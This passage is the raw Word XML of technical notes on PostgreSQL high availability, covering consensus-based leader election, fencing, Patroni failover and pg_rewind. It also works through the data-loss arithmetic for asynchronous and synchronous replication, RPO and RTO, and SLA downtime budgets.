    <w:p w14:paraId="15081529" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Leader election via distributed consensus (etcd, ZooKeeper, Consul)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72209325" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary holds a distributed lock (lease) — renewed every N seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B9D6B2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  If primary fails to renew lease → lock expires → another node acquires it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E4601" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Only the node holding the distributed lock is allowed to act as primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8057F2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65BAD8F9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Protection against split brain:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C22B52D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Two nodes cannot both hold the distributed lock (consensus guarantees)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8D6EB0" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Even if network partition: only one partition can achieve consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDC52FE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    → Only one node becomes primary → no split brain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7568BA2E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBB63BB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  DCS (Distributed Configuration Store) as external arbiter:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EDE1DD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    etcd cluster (usually 3 or 5 nodes, independently deployed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FEA876" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Primary proves liveness to etcd (not to replicas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C919427" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Replicas check etcd before promotion (has the primary lost its lease?)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27ED7B7B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA6D2F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Fencing:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F7E077" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Before promoting replica, ensure old primary CANNOT write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6AF870" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C9DE45" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      STONITH (Shoot The Other Node In The Head): reboot/power-off old primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1360C108" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Fence old primary's storage: revoke its access to block storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01D9F9B8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Network fencing: block old primary's network access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224DC8F5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Without fencing: can't guarantee split brain prevention</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2332EE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Patroni — the production-grade HA solution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65895C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54537167" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Patroni architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032543C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Patroni agent runs on each PostgreSQL node</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D65724" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Uses etcd/ZooKeeper/Consul for distributed consensus</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AD9D5A5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E6056B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary node:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106A919F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Holds etcd leader key (TTL: default 30s, renewed every 10s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636139A1" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Runs PostgreSQL in primary mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23ECD086" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Continuously updates etcd with current LSN and replication state</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0861E5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA07765" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica nodes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A111212" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Monitor etcd for leader key expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEEEEBE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Monitor replication lag (their own lag vs primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3849BD53" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF0EBDF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Failover trigger:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5895B83B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Leader key expires (primary failed to renew) → etcd lease expires</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C990C5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C3872C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    All replicas simultaneously detect leader key expiry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D255FE8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Enter election:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DDD053E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Each checks etcd for current leader key (expired)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731EC811" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Each checks its own replication lag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEE20A2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Most up-to-date replica (lowest lag) wins election</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1066D107" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Winner: atomically acquires leader key via etcd CAS operation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="536DBBDB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Loser: loses CAS → becomes follower of new primary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CC90E2" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DEFD27" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Old primary recovery:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA28CD9" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Old primary restarts, checks etcd → another node is leader</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="190225D8" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Old primary must demote itself (join as replica of new primary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02728E1D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If old primary's data is ahead of new primary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC29C50" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      Data rewind required (pg_rewind: rewind old primary to new primary's state)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F3A897" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09979F9F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  pg_rewind:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D3466B" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Identifies where old primary diverged from new primary's timeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C413E6D" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Rewinds old primary's WAL to that divergence point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E04C758" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Old primary then replicates from new primary (applying missing changes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48605C9A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    Alternative to full base backup — much faster for minimal divergence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33CD4D7F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Failover Data Loss — The Math</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6622DAE6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How much data can be lost during failover:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62349A9F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171CA346" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Asynchronous replication, primary fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B08248" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Primary committed transactions up to LSN 0/F234A890</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82D36E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica received WAL up to LSN 0/F234A020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF6038C" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F2CA81" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Lost: 0/F234A890 - 0/F234A020 = 0x870 bytes = 2160 bytes of WAL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F9CFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614685ED" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Translates to: any transactions whose WAL records are in those 2160 bytes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698CC424" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Could be: 0 transactions (if no commits in that range) or N transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584D7A42" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F58265F" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  At high commit rate (10,000 tx/sec, 100 bytes WAL/tx = 1MB/sec WAL):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C4CFAB" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    If replica is 1 second behind: ~1MB WAL lost = ~10,000 transactions lost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="105FC610" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453E1FB7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Synchronous replication, primary fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B538964" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  No committed transactions lost (replica acknowledged before commit returned)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECAC055" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  But: transactions in-progress at failure time (not yet committed) are rolled back</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53415239" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Lost: 0 committed transactions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFC2A47" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EEA9E7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>The synchronous_commit=remote_apply guarantee:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F8E107" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Committed transactions visible on replica before client sees commit acknowledgment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DDA8C7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Replica promotion: immediately consistent (no catch-up needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA0AEF7" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Zero data loss AND zero consistency window after failover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3864F6F3" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RPO (Recovery Point Objective) and RTO (Recovery Time Objective):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14628B1E" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237FB246" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>RPO: maximum acceptable data loss (measured in time or transactions)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E6FFFE" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Async replication: RPO = replication lag at time of failure (seconds to minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7A7EF" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Sync replication: RPO = 0 (no committed data loss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F274FC" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277EB660" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>RTO: maximum acceptable downtime (time from failure to recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432737A6" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Simple manual failover: 5-30 minutes (human detection + manual promotion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528EACAD" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Automated failover (Patroni): 30-60 seconds (detection + election + promotion)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46834CBA" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  Active-active multi-primary: seconds to milliseconds (no failover needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36235A48" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="054B466A" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t>Designing for SLAs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D90436" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  "99.99% availability" = 52 minutes downtime/year</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27834BD5" w14:textId="77777777" w:rsidR="00A12791" w:rsidRPr="00A12791" w:rsidRDefault="00A12791" w:rsidP="00A12791">
      <w:r w:rsidRPr="00A12791">
        <w:t xml:space="preserve">  With 1-minute RTO and 4 failures/year: 4 minutes downtime = achievable</w:t>
      </w:r>
    </w:p>
